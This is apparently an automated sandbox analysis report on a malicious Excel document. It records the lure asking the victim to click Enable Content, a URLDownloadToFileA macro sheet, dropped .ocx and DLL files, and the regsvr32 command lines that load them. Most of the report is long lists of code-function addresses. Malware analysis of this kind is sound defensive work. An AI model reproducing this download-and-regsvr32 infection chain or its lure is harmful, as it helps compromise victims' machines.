                      Source: Screenshot number: 4 | Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
                      Source: Screenshot number: 4 | Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
                      Source: DETAILS 25922194612.xls | Macro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\uxevr1.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\uxevr3.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\uxevr2.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\uxevr4.ocx
                      Source: DETAILS 25922194612.xls | Initial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\system32\KuSAkvGE\
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800227E03_2_00000001800227E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001C00004_2_001C0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800083F84_2_00000001800083F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800264104_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000680F4_2_000000018000680F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025C304_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800136744_2_0000000180013674
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017C8C4_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A48C4_2_000000018000A48C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180011CCC4_2_0000000180011CCC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BEF04_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800297104_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026F144_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800237484_2_0000000180023748
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001D584_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B3684_2_000000018002B368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800013784_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800105904_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800091A84_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800165E44_2_00000001800165E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018FE84_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001ABE84_2_000000018001ABE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029DF04_2_0000000180029DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800243F44_2_00000001800243F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015DF44_2_0000000180015DF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800011F44_2_00000001800011F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800247FC4_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001DBFC4_2_000000018001DBFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FE084_2_000000018000FE08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001100C4_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180027E144_2_0000000180027E14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B6184_2_000000018000B618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800232204_2_0000000180023220
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180027C284_2_0000000180027C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020A344_2_0000000180020A34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800076344_2_0000000180007634
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180022E384_2_0000000180022E38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E6384_2_000000018000E638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002143C4_2_000000018002143C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001303C4_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A8404_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800038404_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B4444_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F0484_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002AC4C4_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800100504_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800102504_2_0000000180010250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800030504_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180011E5C4_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000445C4_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C85C4_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800034604_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026A644_2_0000000180026A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800042644_2_0000000180004264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029C6C4_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001586C4_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000406C4_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E06C4_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BC704_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F6784_2_000000018000F678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E2784_2_000000018000E278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001447C4_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180005E7C4_2_0000000180005E7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026C804_2_0000000180026C80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180010C844_2_0000000180010C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025E884_2_0000000180025E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800160884_2_0000000180016088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800028884_2_0000000180002888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002868C4_2_000000018002868C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FC8C4_2_000000018000FC8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002D0984_2_000000018002D098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014E984_2_0000000180014E98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014AA44_2_0000000180014AA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800126A84_2_00000001800126A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800036A84_2_00000001800036A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800154B84_2_00000001800154B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A6BC4_2_000000018002A6BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CABC4_2_000000018001CABC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000EAC04_2_000000018000EAC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002C6C84_2_000000018002C6C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002C2C84_2_000000018002C2C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800064D04_2_00000001800064D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B6D44_2_000000018001B6D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800180D44_2_00000001800180D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800054D84_2_00000001800054D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F2DC4_2_000000018000F2DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800202E04_2_00000001800202E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002CCE04_2_000000018002CCE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800226E04_2_00000001800226E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800254E44_2_00000001800254E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800184E84_2_00000001800184E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800010E84_2_00000001800010E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180019AF04_2_0000000180019AF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E8F04_2_000000018000E8F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A0F84_2_000000018002A0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012EF84_2_0000000180012EF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800199004_2_0000000180019900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800119044_2_0000000180011904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F9084_2_000000018001F908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002490C4_2_000000018002490C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001890C4_2_000000018001890C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001D5104_2_000000018001D510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800177104_2_0000000180017710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180003D184_2_0000000180003D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002191C4_2_000000018002191C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800163204_2_0000000180016320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001D1284_2_000000018001D128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000D12C4_2_000000018000D12C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800149304_2_0000000180014930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800085344_2_0000000180008534
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C7404_2_000000018000C740
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020F444_2_0000000180020F44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CD444_2_000000018001CD44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023B484_2_0000000180023B48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B9484_2_000000018000B948
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800217544_2_0000000180021754
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800223584_2_0000000180022358
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029F5C4_2_0000000180029F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000796C4_2_000000018000796C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001BF704_2_000000018001BF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800253744_2_0000000180025374
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180007F744_2_0000000180007F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180021F7C4_2_0000000180021F7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800197884_2_0000000180019788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001B8C4_2_0000000180001B8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028D944_2_0000000180028D94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800283944_2_0000000180028394
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013B944_2_0000000180013B94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001479C4_2_000000018001479C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E7A04_2_000000018000E7A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800087A44_2_00000001800087A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017BA84_2_0000000180017BA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000EBAC4_2_000000018000EBAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012BB84_2_0000000180012BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B3B84_2_000000018001B3B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800171B84_2_00000001800171B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018DBC4_2_0000000180018DBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800257C04_2_00000001800257C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180008BC04_2_0000000180008BC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800117C44_2_00000001800117C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800141C84_2_00000001800141C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B1D44_2_000000018002B1D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023DDC4_2_0000000180023DDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800227E04_2_00000001800227E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF75312B05_2_000007FEF75312B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF753443C5_2_000007FEF753443C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF75353FB5_2_000007FEF75353FB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF7534A705_2_000007FEF7534A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF7535E015_2_000007FEF7535E01
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF7535CAD5_2_000007FEF7535CAD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF75368505_2_000007FEF7536850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_001400005_2_00140000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800264105_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180025C305_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001D585_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180011E5C5_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C6C85_2_000000018002C6C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C2C85_2_000000018002C2C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026F145_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800163205_2_0000000180016320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800013785_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018FE85_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001ABE85_2_000000018001ABE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800243F45_2_00000001800243F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800083F85_2_00000001800083F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800247FC5_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001DBFC5_2_000000018001DBFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001100C5_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180027C285_2_0000000180027C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002143C5_2_000000018002143C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001303C5_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A8405_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800038405_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B4445_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F0485_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002AC4C5_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800100505_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800030505_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000445C5_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C85C5_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800034605_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029C6C5_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001586C5_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000406C5_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E06C5_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BC705_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001447C5_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026C805_2_0000000180026C80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180010C845_2_0000000180010C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800160885_2_0000000180016088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800028885_2_0000000180002888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180017C8C5_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FC8C5_2_000000018000FC8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002D0985_2_000000018002D098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800154B85_2_00000001800154B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180011CCC5_2_0000000180011CCC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800064D05_2_00000001800064D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800180D45_2_00000001800180D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800054D85_2_00000001800054D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002CCE05_2_000000018002CCE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800254E45_2_00000001800254E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800184E85_2_00000001800184E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800010E85_2_00000001800010E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E8F05_2_000000018000E8F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A0F85_2_000000018002A0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800199005_2_0000000180019900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800119045_2_0000000180011904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F9085_2_000000018001F908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002490C5_2_000000018002490C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001890C5_2_000000018001890C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D5105_2_000000018001D510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180003D185_2_0000000180003D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002191C5_2_000000018002191C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D1285_2_000000018001D128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D12C5_2_000000018000D12C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800149305_2_0000000180014930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800085345_2_0000000180008534
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001CD445_2_000000018001CD44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B9485_2_000000018000B948
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000796C5_2_000000018000796C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800105905_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180028D945_2_0000000180028D94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800091A85_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800171B85_2_00000001800171B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018DBC5_2_0000000180018DBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800141C85_2_00000001800141C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002B1D45_2_000000018002B1D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180023DDC5_2_0000000180023DDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800165E45_2_00000001800165E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029DF05_2_0000000180029DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015DF45_2_0000000180015DF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800011F45_2_00000001800011F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FE085_2_000000018000FE08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180027E145_2_0000000180027E14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B6185_2_000000018000B618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800232205_2_0000000180023220
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020A345_2_0000000180020A34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800076345_2_0000000180007634
                      Source: DETAILS 25922194612.xls Macro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: DETAILS 25922194612.xls ReversingLabs: Detection: 41%
                      Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                      Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                      Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                      Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll"
                      Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6882.tmp
                      Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@18/18@5/5
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                      Source: DETAILS 25922194612.xls OLE indicator, Workbook stream: true
                      Source: DETAILS 25922194612.xls.0.dr OLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180029710 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                      Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: DETAILS 25922194612.xls Initial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180006951 pushad ; retf 3_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180006951 pushad ; retf 5_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006951 pushad ; retf 8_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_0000000180006951 pushad ; retf 10_2_0000000180006953
